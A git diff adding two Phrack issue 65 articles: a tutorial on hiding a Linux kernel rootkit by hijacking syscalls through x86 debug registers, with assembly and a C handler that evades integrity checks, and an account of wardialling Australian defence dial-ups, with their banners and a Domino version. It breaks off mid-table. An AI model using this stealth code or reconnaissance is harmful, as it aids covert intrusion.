+M=1AY;O/`U%48;?LGY(2)BR^"E!>9Y(=D@['0ORX;M#+X1#ULY/5S2=H;=]E7
+M$6QB)B!T5RO(P<C0.A7LQT--OK:E$3D)`D6L+P,EF9`).1I($Q=-U(`.Y$'Z
+M65E'^T@I8BD7J3A)(K#NE^AOP\BUH])*4L?I*1ZH"L^QB4U,KH<V1Z+:V7BC
+M/@M)*7:Y=30]BCT6:5H/W!8T)S/JI+`PLW$:^\)/S`28T/ZY-HUUZHD7=GQ2
+MV7Y9#L2T(79F!\-;H10BSBWXY=SA&+SR`88468\!<S:7[2U6`3$/JX]H-IDT
+MTE@>'VZOD#@\&\I\QA$/!>F^/*1$7P[>!<8.QA0HIM':V`=FK92-8#6__X-\
+M?O=)I_@#+I1$:ECSR$;X>YC'!6FE@2\/F(SX"2EF8B@6NUV_P@P\?A4!M-@Y
+M;">$HG-8T:&B<@`9VK=[FH\0$N'S'X$;*U;Y10`UT*$A<-#`#WKK^+)MX)MB
+M!3]TS7IF#X]IKJ9GND)5KOC#Y49')?C=^\1M==(`PHU;4+HAU2Q@2+H[:CWH
+M!^"8,U4$?>E>/PUXEO22&[F=L?*8,X9%'A,P-4#][A1A5(-+1U!-RB9&NU=F
+MZJJB^D1`J%(*QS);;UMDN#N[FM-W/*\*^4_>:>/<FG/9F)LHV?'K%,B(OP2Y
+ML6PY0?.6XOWLHA3$>H.>7FUA]'1FJB6Q^T).O(%'>@O=/7GM&BG6\$OHL'PY
+M3E3LH\>/\<$I%ZW$4WE/"C`I5L1;S^N)X:S[Z;&<_R#W599W*BM9R4I6LI*5
+MK&0E*UG)2E:RDI6L9"4K6<E*5K*2E:QD)2M9R4I6LI*5K&0E*UG)2E:R\K7*
+*_P,D9_:I`/``````
+`
+end
diff --git a/phrack65/8.txt b/phrack65/8.txt
new file mode 100644
index 0000000..2ce8dc6
--- /dev/null
+++ b/phrack65/8.txt
@@ -0,0 +1,410 @@
+                             ==Phrack Inc.==
+
+               Volume 0x0c, Issue 0x41, Phile #0x08 of 0x0f
+
+
+|=---------------------=[ Mistifying the debugger, ]=--------------------=|
+|=---------------------=[   ultimate stealthness   ]=--------------------=|
+|=-----------------------------------------------------------------------=|
+|=------------------------=[ halfdead@phear.org ]=-----------------------=|
+
+
+--[ Introduction 
+
+Over the years, there have been a plethora of techniques and methods of
+hiding one's presence in a hacked system. Many of them were focused on
+directly tampering the system call table, others were modifying the
+interrupt handler, while others were operating at the VFS layer. But all 
+of them were modifying the underlying operating system in a very visible
+manner, making them easily detected. 
+
+In the article I will present a technique that is able to achieve ultimate 
+stealthness in kernel rootkits, by using a common x86 feature, the 
+debugging mechanism. Although it works on any IA-32 compatible platform, 
+the following technique will be detailed for Linux operating system and I 
+will show you how one can intercept the normal flow of execution without 
+touching the "classical" hooking targets. In fact, this technique can be
+so good that no one will ever notice our presence.
+
+When we refer to "debugger" in this article, we actually mean the IA-32
+debugging mechanism, which is only accessible from ring zero. Userland
+debuggers don't make use of this mechanism, only some kernel debuggers 
+do.
+
+
+--[ The debugger
+
+        "The IA-32 architecture provides extensive debugging
+        facilities for use in debugging code and monitoring
+        code execution and processor performance. These
+        facilities are valuable for debugging applications
+        software, system software, and multitasking operating
+        systems."
+
+In order to make life easier for developers, Intel introduced a mechanism
+that was intented to manage the debugging process. This mechanism is 
+handled by a set of special registers (called 'debugging registers, 
+DR0..DR7) which  allow the user to set hardware breakpoints on memory 
+addresses. As soon as the execution flow hits an address marked with a 
+breakpoint, it hands the control to the debug interrupt handler (INT 1), 
+which calls the do_debug() function (defined in ../i386/kernel/traps.c) to 
+take care of the actual situation that raised the exception. 
+
+The debugging support is accessed through the debug registers (DB0 through
+DB7) and two model-specific registers (MSRs). For the purpose of this paper
+we will only focus on the debug registers. These registers hold the 
+addresses of memory and I/O locations, called breakpoints. Breakpoints are
+user-selected locations in a program, a data-storage area in memory, or 
+specific I/O ports  where a programmer or system designer wishes to halt 
+execution of a program and examine the state of the processor by invoking 
+debugger software. 
+
+A debug exception (#DB) is generated when a memory or I/O access is made 
+to one of these breakpoint addresses. A breakpoint is specified for a 
+particular form of memory or I/O access, such as a memory read and/or 
+write operation or an I/O read and/or write operation. The debug registers 
+support both instruction breakpoints and data breakpoint. The MSRs (which 
+were introduced into the IA-32 architecture in the P6 family processors)
+monitor branches, interrupts, and exceptions and record the addresses of 
+the last branch, interrupt or exception taken and the last branch taken 
+before an interrupt or exception.
+
+
+--[ The debug registers
+
+There are 8 debug registers supported by the Intel processors, which 
+control the debug operation of the processor. These registers can be 
+written to and read using the move to or from debug register form of 
+the MOV instruction. A debug register may be the source or destination 
+operand for one of these instructions. The debug registers are privileged
+resources; a MOV instruction that accesses these registers can only be 
+executed in real-address mode, in SMM, or in protected mode at a CPL 
+of 0. An attempt to read or write the debug registers from any other 
+privilege level generates a general protection exception.
+
+The primary function of the debug registers is to set up and monitor 
+from 1 to 4 breakpoints, numbered 0 though 3. The debug mechanism allows
+us to manage the breakpoints through two special registers, DR6 and DR7,
+which I will describe in detail later on.  For each breakpoint, the 
+following information can be specified and/or detected with the debug 
+registers:
+	
+	- The linear address where the breakpoint is to occur.
+ 	- The length of the breakpoint location (1, 2, or 4 bytes).
+ 	- The operation that must be performed at the address for a debug 
+	  exception to be generated.
+	- Whether the breakpoint is enabled.
+	- Whether the breakpoint condition was present when the debug 
+	  exception was generated.
+
+-------[ Debug address registers
+
+Each of the debug-address registers (DR0-DR3) holds the 32-bit linear
+address of a breakpoint. Breakpoint comparisons are made before physical
+address translation occurs.
+
+
+-------[ Debug registers DR4 and DR5
+
+Debug registers DR4 and DR5 are reserved when debug extensions are enabled 
+(the DE flag in control register CR4 is set), and attempts to reference 
+these registers will raise an invalid-opcode exception. When the DE flag 
+is not set, these registers are aliased to DR6 and DR7.
+
+
+------[ Debug status register (DR6)
+
+This special register is used to report the debug conditions that existed 
+at the time the last debug exception occured. The flags in this register
+show the following information:
+
+	- B0..B3 (bits 0..3) indicate that a breakpoint condition was
+	  detected. These flags are set if the condition described
+	  for each breakpoint by the LENn, and R/Wn flags in debug 
+	  control register DR7 is true. They are set even if the 
+	  breakpoint is not enabled by the Ln and Gn flags in register 
+	  DR7.
+
+	- BD (bit 13) (debug register access detected) indicates that the 
+	  next instruction in the instruction stream will access one of the
+	  debug registers (DR0..DR7). This flag is enabled when the general
+	  detect (GD) flag in debug control register DR7 is set.
+
+	- BS (bit 14) (single step) indicates (when set) that the debug
+	  exception was triggered by the single-step execution mode.
+	
+	- BT (bit 15) (task switch) indicates (when set) that the debug
+	  exception resulted from a task switch where the debug trap flag
+	  in the TSS of the target task was set.
+
+The processor never clears the contents of DR6 register.
+
+
+------[ Debug control register (DR7)
+
+The debug control register (DR7) enables or disables breakpoints and sets
+breakpoint conditions. Its flags and fields control the following things:
+	
+	- L0..L3 (bits 0, 2, 4, 6) (local breakpoint enable) enable (when 
+	  set) the breakpoint  condition for the associated breakpoint for 
+	  the current task. When a breakpoint condition is detected and its 
+	  associated Ln flag is set, a debug exception is generated. The 
+	  processor automatically clears these flags on every task switch 
+	  to avoid unwanted breakpoint conditions in the new task.
+
+	- G0..G3 (bits 1, 3, 5, 7) (global breakpoint enable) enable (when
+	  set) the breakpoint condition for the associated breakpoint for 
+	  all tasks. When a breakpoint condition is detected and its 
+	  associated Gn flag is set, a debug exception is generated. 
+	  The processor does not clear these flags on a task switch, 
+	  allowing a breakpoint to be enabled for all tasks.
+	
+	- LE and GE (bits 8 and 9) (local and global exact breakpoint
+	  enable) cause the processor to detect the exact instruction that 
+	  caused a data breakpoint condition. Not supported in P6 family
+	  processors.
+	
+	- GD (bit 13) (general detect enable) enables (when set)
+	  debug-register protection, which causes a debug exception to be 
+	  generated prior to any MOV instruction that accesses a debug register.
+	  When such a condition is detected, the BD flag in debug status register 
+	  DR6 is set prior to generating the exception.
+
+	- R/W0..R/W3 (bits 16, 17, 20, 21, 24, 25, 28, and 29) (read/write) 
+	  specifies the breakpoint condition for the corresponding breakpoint. 
+	  For more information read the Intel manual.
+	
+	- LEN0..LEN3 (bits 18, 19, 22, 23, 26, 27, 30, and 31) (length)
+
+
+--[ The magic
+
+Ok, so we've learnt almost everything now about the IA-32 debugging 
+mechanism. Where is the goodies you've promised?? Now we know a few 
+important things: we can set a breakpoint on a memory address and as soon 
+as execution flow hits our breakpoint, the execution is redirected to the 
+debug handler (INT 1). Uhmm, so what if we replace the existing debug 
+handler or one of the underlying functions with our own? As we can see 
+from entry.S, 
+
+	ENTRY(debug)
+        pushl $0
+        pushl $ SYMBOL_NAME(do_debug)
+        jmp error_code
+
+the actual debug handler is a C function, do_debug() defined in traps.c.
+Yes, ok, I think we are able to patch the INT 1 handler and then call
+do_debug() on our own OR we could come up with our own do_debug() and 
+expect to be called by the debug handler, so we rest assured that the 
+IDT remains untouched. But what should our handler handle? Most obviously,
+we need to check a few parameters and then pass control to the actual
+operating system do_debug(). But what parameters should we monitor? Keep
+reading...
+
+
+------[ Hijacking the sys_call_table[]
+
+Now you should have an idea how to hijack the syscall table making use 
+onunnt on read/write/execution on targetted address in memory. This can 
+be either INT 80 handler address or syscall table address, it matters
+less as the effect is the same, in the end. Therefore, each time the 
+operating system is going for a syscall, it will wind up in our handler. 
+We have two options here: A) hijacking the INT 80 handler directly in 
+IDT or B) hijacking the actual address of sys_call_table[] in memory. Any 
+of them is fit for our purposes, so we will aim for A. The following 
+function will return the address of INT 80 handler.
+
+	get_idt_entry:
+        	sidt    idtr
+	        movl    idtr+2, %ebx
+        	leal    (%ebx, %eax, 8), %ebx
+	        movw    (%ebx), %cx
+	        roll    $16, %ecx
+	        movw    0x6(%ebx), %cx
+	        roll    $16, %ecx
+	        movl    %ecx, %eax
+        	ret
+
+Once we know the address, we can set up a breakpoint as follows:
+	
+	set_bpm:
+        	movl    $0x80, %eax
+	        call    get_idt_entry
+        	movl    %eax, %dr0
+	        xorl    %eax, %eax
+        	orl     $0x2080, %eax
+	        movl    %eax, %dr7
+        	ret
+
+As you can see, the set_bpm() function will load DR0 with memory address
+where INT 80 is located and, also, will set up the according flags in DR7,
+including the magic GD bit, which allows us to monitor WHO and WHY is
+accessing the debug registers. This bit is very important for us because
+it "causes a debug exception to be generated prior to any MOV instruction 
+that accesses a debug register". Wow, do you mean...? Yeah, if SOMEONE is 
+trying to read/write the debug registers, the control is passed to our 
+handler BEFORE the instruction takes place. So, we know if someone, a 
+debugger or some tool of the devil, is checking the debug registers, even 
+before they  know it. This gives us time to cover our tracks: we can undo 
+everything and wait some time for danger to pass, we can simply skip the 
+instructions affecting the debug registers, etc. The best thing to do is 
+to show the system clean debug registers and after a short period of time,
+hook everything back to best suit our needs. The best aproach is to come 
+up with a code emulator, analyzing the type of the instruction accessing 
+debug registers, and based on that decide what action will follow: clean 
+the debug registers and restore later or simply increase the instruction 
+count so that the instruction is simply ignored. Anyway, this leaves an 
+open discussion.
+
+
+------[ The handler
+
+Now, we managed to redirect the flow of execution without patching anything
+in the syscall table or INT 80 handler. But still, what should our handler
+handle? For starter, in its most simplistic form, our handler needs to 
+check the value of the %eax register, because at this point, it contains 
+the desired syscall number, and based on that it should feed the OS with 
+our hacked syscall. This is how a very simple handler should look like:
+
+asmlinkage void new_do_debug(struct pt_regs * regs, long error_code) 
+{
+
+  	unsigned long condition;
+	unsigned long mask = 0x2008;
+
+  
+ 	__asm__ __volatile__("movl %%db6,%0" : "=r" (condition));
+
+  	if (condition & BD_FLAG) { /* someone is r/w the registers */
+            condition &= ~BD_FLAG;
+            __asm__ __volatile__ ("movl %0, %%db6" : : "r" (condition));
+	    regs->eip += 3;
+	    __asm__ __volatile__ ("movl %0, %%db7" : : "r" (mask));
+        }
+	
+	if (condition & DR_TRAP0) {
+            if (regs->eax == __NR_time) 
+	        sys_call_table[__NR_time] = hacked_time;
+	    
+            if (regs->eflags & VM_MASK) {
+                (*old_do_debug)(regs,error_code);
+                __asm__ __volatile__ ("movl %0, %%db7" : : "r" (mask));
+            }
+
+            condition &= ~DR_TRAP0;
+            __asm__ __volatile__ ("movl %0, %%db6" : : "r" (condition));
+            __asm__ __volatile__ ("movl %0, %%db7" : : "r" (mask));
+            regs->eflags |= X86_EFLAGS_RF;
+        } 
+	else 
+	{
+            (*old_do_debug)(regs, error_code);
+            __asm__ __volatile__ ("movl %0, %%db7" : : "r" (mask));
+	}
+
+        return;
+}
+
+What are we doing here? First, we grab the values in the status register
+(DR6) and try to figure out what triggered our handler. If our execution
+comes as a result of the breakpoint we've placed, we compare the value in
+%eax register to the value of the syscall we decided to hijack, which was 
+sys_time() in our case. In the example provided, due to the lack of space
+and time, we did a direct change of the sys_call_table[] but this is not
+something to worry about as, the hacked_time() is modifying the
+sys_call_table[] back to original in the instant it gets executed:
+
+
+asmlinkage long hacked_time(int *tloc)
+{
+ 	sys_call_table[__NR_time] = original_time;
+	printk("<1>WE changed it!!\n");
+ 	return original_time(tloc);
+}
+
+Ofcourse, there are other ways of doing it without touching the syscall
+table at all but take into consideration that the first thing the
+hacked_time() does is changing back the value in sys_call_table[], meaning
+that the actual change takes place for less than a microsecond so it 
+shouldn't be a problem. 
+
+A better method would be to analyze the parameters of the syscall, based on
+the syscall number, which at the time our handler takes place is the value 
+in %eax register. We could feed the hacked parameters by simply filling the
+according registers. This method would create a "virtual" syscall table, 
+so we don't need to touch the actual syscall table at all.
+
+So now we learnt how to set a breakpoint on a memory address, how to enable
+that breakpoint; we also learnt that we can hijack the normal execution 
+flow without tampering the INT 80 handler nor the syscall table handler 
+nor the syscall table itself. Yes, you can say it's a lovely technique, a 
+bit of magic. But still, we modify the INT 1 handler, or at least, we patch
+the do_debug() function, so we're not that stealth. Just keep reading...
+
+
+
+---[ Blindfold
+
+We learnt so many beautiful things by now, we take control of the system 
+and no one detects a direct tampering of the kernel. We covered our tracks
+thanks to the GD/BD bits so, if someone is looking at the debugging
+registers we simply ignore their curiosity (regs->eip +=3). But what if
+someone wants to check all the IDT for integrity? Or what if a debugger
+or a similar tool needs to place its own handler on INT 1? Are we lost 
+then? 
+It sure looks like it.. 
+
+But wait.. DR6 and DR7 come to rescue once more. What we need to do is the 
+following:
+	
+	- set up your handler on INT 1
+	- set up the breakpoint to watch for INT 80 address
+	- set a secondary breakpoint to watch on our handler's address
+	
+Oh, wait! It can't be that simple. Yes, it is! Like this, we practically
+don't affect the kernel at all, for the unwanted eye. In our ideal handler,
+the code emulator checks the type of the instruction that attempts to 
+access debug registers, wether is the breakpoint we put on INT 80 or 
+INT 1 and act accordingly. We already explained what it should do for 
+hijacking INT 80, let's talk now about INT 1. By placing a secondary 
+breakpoint on INT 1 or do_debug() function, we make sure that we know 
+apriori when someone attempts to read the only location in the kernel 
+memory we modified. The best thing to do is to make that single address 
+back to original. Like this, when some devilish tool attempts to check for 
+our presence in the IDT too (i don't think there any tools doing that 
+outhere, but that's simply because a whitehat would've never thought it's 
+necessary), we let them see the untouched value. This is "deep cover" mode.
+But did we lose the control over the kernel now? Well, not really, we're 
+still in control: we can "reinstall" our rootkit after a few nanoseconds, 
+so they miss us every time they look at us. It's like blindfolding them. 
+This technique is also helpful when dealing with a debugger 
+(or similar tool) trying to place its own hook in INT 1 handler. Think 
+about it: we detect the attempt and make everything back to normal, they 
+place their hook, we hijack their hook as a normal INT 1 hijack and as 
+soon as they check for their presence, for example, by checking the
+presence of the handler, we let them see themselves. It's like chaining
+hooks, or so. When I discovered that I was stunned. When I realised it
+really works I was amazed. This is the ultimate stealthness, the holygrail
+of hackers!
+
+
+---[ Closing words
+
+This technique has been actively used in the underground for more than 8
+years now. The beauty about it: it is, in fact, a basic IA-32 feature. They
+cannot defeat against it without removing the whole debug mechanism. I
+decided to make it public in phrack through a "scientific" paper *g* but it
+wasn't my choice: the technique leaked a while ago. I highly doubt that the
+person that leaked it knows exactly what his tool is actually capable of 
+and what is actually doing, so I decided to help him and any other hacker 
+in the world willing to learn and improve their skills. As you have seen, 
+this is one very powerful technique, allowing one to achieve full 
+stealthness on a target system. Being a fundamental processor feature, 
+means it can be used on ANY operating system running on IA-32 and also, 
+there is no way of detecting or protecting against it, even if it is not 
+0day anymore ;(
+
+
+---[ Kudos
+
+halvar, twiz, reverser, sd and the rest of the digitalnerds
diff --git a/phrack65/9.txt b/phrack65/9.txt
new file mode 100644
index 0000000..2ece255
--- /dev/null
+++ b/phrack65/9.txt
@@ -0,0 +1,830 @@
+                             ==Phrack Inc.==
+
+               Volume 0x0c, Issue 0x41, Phile #0x09 of 0x0f
+
+
+                             ==Phrack Inc.==
+
+|=---------------------------------------------------------------------=|
+|=--------=[ Australian Restricted Defense Networks and FISSO ]=-------=|
+|=---------------------------------------------------------------------=|
+|=-----------------------------[ The Finn ]----------------------------=|
+|=-----------------------=[ TheFinn@phrack.org ]=----------------------=|
+|=---------------------------------------------------------------------=|
+
+
+--[ Contents
+
+1. Introduction 
+2. Wardialling and You 
+3. Origins of FISSO 
+4. Australian DoD and FISSO 
+5. An Introduction to the EPL and CCRA 
+6. The EPL and CCRA in depth 
+7. Other standards
+8. Secrets
+9. Conclusion 
+10. Annex
+
+
+--[ 1. Introduction
+
+This document explains and introduces a new secret network maintained
+by the Australian DoD. As far as I know, this network is similar in
+its usage to the American DoD's SIPRNET. To be used in conjunction
+with specially designed software to promote better communication in
+the procedures and implementation of command and control systems,
+intelligence and logistics.
+
+Please keep in mind, much if it will be based on my own past experience,
+observations and guesswork. Due to the volatile nature of the information
+I will keep it "barely legal" while trying to introduce some of the
+concepts behind the way the various DoD's are now interconnecting and 
+thus maintaining the same network security philosophy across the world.
+
+I found this document a good idea because to find this information out
+required weeks of reading and knowing where to find these things on the
+web. Also you'd have to read the kinds of documents that first specifies
+how it's going to use verbs within the document, then they will convey
+how they are going to use nouns... etc...
+
+You really don't want to go there ;)
+
+
+--[ 2. Wardialling and You
+
+After wardialling a lot of numbers I found some really interesting dialups
+belonging (obviously) to the DoD which were part of the network belonging
+to the Australian Navy.
+
+You don't really see a lot on wardialling anymore as there are so many
+ISP's people can connect to for vpn connectivity to anywhere in the world,
+however the military still considers modems a good way to communicate
+as they can control the access point themselves and log everything.
+
+I personally use THCSCAN on windows to wardial with, as it works well 
+in Australia for me as well as other places. (I say it works well in
+Australia because over the years many wardiallers have come out with
+VERY stringent rules about the numbers to be dialled which only conform
+to US area-code and dialling standards - very annoying -_-). I always
+have it on my laptops - go nowhere without it ;). THC have had to remove
+many of  their great tools from their website recently because of the
+changes in German law regarding internet security tools, but thanks to
+the guys from packetstorm it is still available there.
+
+The other good wardialler I love to use on linux is iwar. [8]
+This is a really nice wardialler, lets you use as many modems as you
+can fit on the box. It can also log all the data to a mysql database - 
+which I am a fan of. They are working on a sip/iax2 functionality which 
+will allow dialout through a sip gateway and wardial the PSTN network on 
+the other side using a software modem - it works, but with some small 
+difficulties at the moment. It's still a work in progress. Pretty 
+sophisticated stuff, really nice.
+
+It is possibly useful to note here even a commercial provider like Free 
+World Dialup will allow you to dial the US, UK and NL toll free numbers 
+over sip for free. There are others which will also give you local calls 
+for free (in countries where they are free) with a little research, you 
+can find them.
+
+Anyhow, unfortunately in Australia, it costs you $0.22c per local call. So
+this kind of info is expensive to get - even if you're dialling on a sunday
+morning at 2am (which is what I did) - unless you like sitting outside 
+peoples homes beiging - I'm getting too old and fat for that anyhow ;)
+
+But for you young skinny folk - wardialling still works well, people should
+be doing it - especially in countries where local calls are free!!
+
+When I first saw these pop up, I was pretty happy. I'd not been at the
+front-door to anything like this in a while, and I knew it would keep
+me interested for a bit. You have to keep in mind, the Department of
+Defence is stupid and worthy of your respect - both. They are like
+mmost other large animals, they are slow to move, but if they hit you,
+you'll get squished like a bug (I have been there before).
+
+However it's amazing how much of an understanding you can get about such
+a large target by doing a little research.
+
+When I first found these dialups it was back in 2004. I noted them
+all down, and kept a copy very safe. Later on a couple years later I
+rechecked them to make sure they were still valid - no other reason.
+
+I did notice a slight change - in the banner.
+
+Here's the original banner back in 2004:
+
+**************************************************************************
+* CONNECT 57600                                                          *
+*                                                                        *
+* The unauthorised access, use or modification of this computer system   *
+* or the data contained therein or in transit to/from, is prohibited     *
+* by Part VIA of the Commonwealth Crimes Act and other Federal and State *
+* laws.                                                                  *
+* This system is subject to regular audit.                               *
+* ----------------------------------------------------------             *
+* For access problems please log a job through the DRN Customer Support  *
+* Centre. Either phone 133272 or e-mail to                               *
+* 'outage.notifications@defence.gov.au'.                                 *
+*                                                                        *
+* ****************                                                       *
+*                                                                        *
+*                                                                        *
+* User Access Verification                                               *
+*                                                                        *
+* Username:                                                              *
+* NO CARRIER                                                             *
+**************************************************************************
+
+Here's the banner in 2006:
+
+**************************************************************************
+* CONNECT 36000 CCCC                                                     *
+*   The unauthorised access, use or modification of this computer system *
+*        or the data contained therein or in transit to/from,            *
+*      is prohibited by Part VIA of the Commonwealth Crimes Act          *
+*              and other Federal and State laws.                         *
+*                                                                        *
+*            This system is subject to regular audit.                    *
+*----------------------------------------------------------------------- *
+* For access problems please log a job through the FISSO Support Centre. *
+* Either phone 02 9359 6000 or e-mail to 'fleet.help@defence.gov.au'.    *
+*                                                                        *
+* *****************                                                      *
+*                                                                        *
+*                                                                        *
+* User Access Verification                                               *
+*                                                                        *
+* Username:                                                              *
+* NO CARRIER                                                             *
+**************************************************************************
+
+(The part I starred out was the actual dialup location and line number 
+which are a code for maintenance purposes for the terminal server I guess.)
+
+As you can imagine I was kinda interested in why it changed from a DRN
+(Defense Restricted Network) to FISSO and what FISSO was.
+
+I checked around the web, and then started reading all the pdf's that
+the military in Australia declassify and make available to the public.
+
+
+--[ 3. Origins of FISSO
+
+Currently the RAN (Royal Australian Navy) has expanded the DRN (Defence
+Restricted Network) to allow for more robust communications protocols
+(still an IP Network) and Services. Thus FISSO (Fleet Information Systems
+Support Organisation) is born out of the old Navy driven DRN Support Group.
+
+During some time when those banners above changed, the DRN was expanded
+to include the other armed services branches Army and Air Force.
+
+They are now implementing the networking technology overseas with
+collaboration efforts in the UK and USA. This will allow far better
+communications between the various armed services of the west and thus
+provide better cohesion. This is where the CCRA comes in.
+
+It is also interesting to mention here one project which has been in the 
+press for years - ECHELON. The USAUK Agreement back after WW2 has allowed 
+vast amounts of intelligence to be shared among the member nations as well 
+as projects like ECHELON to be enacted. This new criteria for security 
+measures internationally is a new brick in the wall for these intelligence
+communities.
+
+Keep in mind - when you see this kind of press for things like ECHELON, 
+that is one thing, but most of the intelligence agencies will not share 
+high level intel with ANYONE, not even allies. What they will usually 
+share are things that used to come under the term "domestic terrorism" - 
+which after 9/11 is a relative term with the Homeland Security Department 
+being formed.
+
+Unfortunately or fortunately - depending how you look at it, as a result,
+the list itself shows clearly which evaluated products are in use on
+such networks - which is at least of interest to us.
+
+One of the fundamental problems with making rules is the existence of
+anomalous circumstances - exceptions - which most of us are aware of ;)
+
+Creating a criteria and then an implementation procedure for security
+devices takes a long time, it is also expensive for the company doing
+the implementation - as they must pay for the DSD staff's time to do
+criteria evaluations - for their specific implementation of their product.
+
+These rules are followed stringently at the time of a particular
+installation.
+
+The amount of beaurecracy found in the DSD is mind-blowing. Thus their
+ability to move quickly on any given specific flaw in security is AT TIMES
+small. They do however keep internal security mailing lists, patches and
+often have direct contact with not just vendors of products but also the
+original architects most of these won't relate to CCRA listed products
+however - more on all of this in the next section.
+
+You will even in places find tricks implemented in a DSD controlled network
+that you will find nowhere else in the world - you have been warned.
+
+
+--[ 4. Australian DoD and FISSO
+
+FISSO themselves are a rehash of the old DRN Support Group who
+maintained the old Defense Restricted Networks for the DoD. FISSO is
+the new project the Navy is (still) running for the DoD - Keep in mind,
+the navy has historically been in charge of many signals projects before
+other branches of armed services have been invited to join or use them -
+the same I believe is true of the US Navy. (Must be all that morse code).
+
+The FISSO Network is a support network for DoD Personel to communicate
+with each other around the world with low level communications
+mediums. Which is to say laptops or other small computer systems with
+modems in order to help officers and other officials to communicate
+across the globe in a secure manner for departmental purposes.
+
+The FISSO Network Support Group has had several contract workers in the
+DoD to create a network with many quite amazing and intricate network
+systems. The officers are able to communicate with voice over ip, digital
+video, whiteboards, conference rooms, text chat and other ways [6].
+They can exchange files and communicate over the parts of the network
+that have been secured by the DSD and the old DRN Group.
+
+Aspect Computing currently hold contract with the DoD for FISSO Core
+Contract and FISSO In-House Contract Payment. Given the amounts in
+the reports I've read, I'd suggest they're probably just contracting
+either software or hardware or both to the Navy (my best guess) who would
+likely only trust DoD or DSD staff to maintain the support centre itself.
+(It might contract out some positions to suitably DoD security cleared
+contractors - likely top-secret or better would be required).
+
+At present Aspect Computing is being paid approximately $2 million
+dollars a year for support to FISSO. This would probably be a 3rd tier
+support network, to be used after both the FISSO Support and KAZ could
+not fix a particular issue.
+
+KAZ Technology Services (Procured by Telstra in 2004) is also a contractor
+who provides Command and Support Systems for Officers and Logistical
+Support Systems Integration that is to say that these guys provide all
+the really nice and interesting comms software that the officers and
+support/logistical personel use for decision making and chain of command
+order verification. (Think of them as the Australian version of SAIC).
+They won a 5 year $200million contract back in 2005 to provide desktop
+computing to the RAN (Royal Australian Navy). Kaz had maintained a
+relationship with DOD since its inception in 1988 and is being offered
+2 year contract extensions up until 2015.
+
+Kaz staff go through rigourous security checks in order to be cleared
+to work on the FISSO network and they have in the past been helicoptered
+out to sea in order to complete work in required timeframes.
+
+From a KAZ document regarding their FISSO solution:
+"Behind these capabilities, KAZ high security architecture integrates
+Lotus Notes R5, Domino, SameTime (including server to server federated
+architecture), LAN/WANs, MS Windows NT Servers, MS Windows Terminal
+Servers, Citrix Mataframe Xpe 1.0, Ultra Thin Clients, HP-UX and
+Hummingbird Exceed.
+
+The architecture also draws on TCP/IP, ISDN and modems to connect
+the Fleet to services across Defence intranets, with the addition
+of cryptographic black boxes outside each of the on-board servers to
+maintain military level security.
+
+KAZ also integrated SameTime technology to extend the Navy's collaborative
+capabilities to a Coalition Wide Area Network (COWAN), involving
+naval systems belonging to Allies such as the United States and United
+Kingdom." [6]
+
+You'll notice KAZ's inference of a Coalition Wide Area Network which I can
+find no other mention of that particular acronym. It might be either a
+marketting insertation or something that eludes to more restricted
+documentation. Either way you have to assume KAZ knows more about it than 
+us and I find it interesting that such a beast is mentioned here.
+
+IBM Provide Hardware and Software also to do with Logistical support
+for the various arms of the DoD. [4]
+
+Sun Microsystems are providing Hardware and Software for security based
+firewalls and other security devices (RFID and biometric authentication
+device drivers and such). [4]
+
+Lotus Notes and Domino are in use widely still to this day - which at
+first I wasn't sure of but I was in discussion on with a friend and he
+pointed out the KAZ website - I'd suggest the Navy would be loath to
+update their systems as often as normal corporates would.
+
+<axe> Lotus-Domino 5.0.9
+<axe> i'm surprised that still exists
+<thefinn> those docs are old
+<thefinn> probably doesn't exist now
+<thefinn> but might still
+<thefinn> u never know, their beaurecracy is amazing sometimes
+<thefinn> i actually worked with a prime 9950 at one company
+<thefinn> didn't even run the newer version of cobol
+<thefinn> ...
+<thefinn> took up half a room
+<thefinn> was sitting next to all the AT&T servers
+<thefinn> funny stuff
+<axe> http://www.kaz-group.com/subscribe
+<axe> yeah, just to keep some legacy code running
+<thefinn> yeah
+<axe> <!-- Lotus-Domino (Release 5.0.9a - January 7, 2002 on Windows 
+           NT/Intel) -->
+<thefinn> wow
+<thefinn> there ya go
+<thefinn> dude im gonna add that in the article
+<axe> how may i own thee, let us count the ways..
+<thefinn> haha
+
+
+--[ 5. An Introduction to the the EPL and CCRA.
+
+Let's introduce the criteria themselves'. At the moment the DSD have 2
+different tables of criteria the ITSEC system and the CCRA for evaluating
+products for secure use on Military and Government networks.
+
+The DSD (Defence Signals Directorate) is the main body behind secure
+communications for the Australian Government, ostensibly they take the
+same role as the NSA does in the US. The EPL (Evaluated Products List)
+is the list the DSD creates and maintains denoting all products put
+forward by vendors for assessment by the DSD for use in high level,
+high security government networks and systems. There are a number of
+criteria in the DSD which products are assessed for.
+
+The CCRA (Common Criteria Recognition Arrangement) is an agreement by
+NATO nations in the west to rate equipment by a shared standard as well
+as share past evaluated products at a common rating so that they might
+interconnect their military and government networks to better control
+your sorry ass. ;)
+
+To allow those poor corporates who have spent lots and lots of dollars
+on getting their products evaluated, time to re-evaluate them under
+the new international system, the CCRA (as a body) are going to allow
+member countries who have used the ITSEC (Information Technology Security
+Criteria) system (including the USA, UK, Australia) to use ITSEC rated
+products as CCRA rated products for the timebeing.
+
+This basically means the EPL's for all these countries are now turning
+into the CCRA. They are amalgamating 50 years of "defense" protocols
+and political maneuvering to be able to dominate more freely. After
+all it wouldn't be nice to have UK troops in some little out of the way
+village while the US Navy are ordering cruise missiles to destroy it from
+1000 kilometers away - the speedy communications methods and stringent
+protocols (military protocols) enabled by a communications network like
+this would allow for these kinds of scenarios to be less of a concern
+and have a million other benefits.
+
+Along with the E1-E6 (ITSEC) and EAL1-EAL7 (CCRA), there is a network 
+designation relating to the secrecy and security needs for the network,
+as follows: UNCLASSIFIED, IN-CONFIDENCE, RESTRICTED, PROTECTED, National
+Security/HIGHLY PROTECTED.
+
+The Document relates the required security device to be used
+interconnecting the different networks which I will include here:
+
+*************************************************************************
+* SRC NETWORK    * AND DST NETWORK IS     *  THEN YOUR GATEWAY REQUIRES *
+*************************************************************************
+* UNCLASSIFIED   * - public domain.       *  a traffic flow filter.     *
+*                * - UNCLASSIFIED.        *                             *
+*                * - IN-CONFIDENCE.       *                             *
+*                * - PROTECTED.           *                             *
+*                * - HIGHLY PROTECTED or  *                             *
+*                *   National Security.   *                             *
+*************************************************************************
+* IN-CONFIDENCE  * - public domain.       *  an EAL2 Firewall.          *
+*                * - UNCLASSIFIED.        *                             *
+*************************************************************************
+*                * - IN-CONFIDENCE.       *  a traffic flow filter.     *
+*                * - PROTECTED.           *                             *
+*                * - HIGHLY PROTECTED or  *                             *
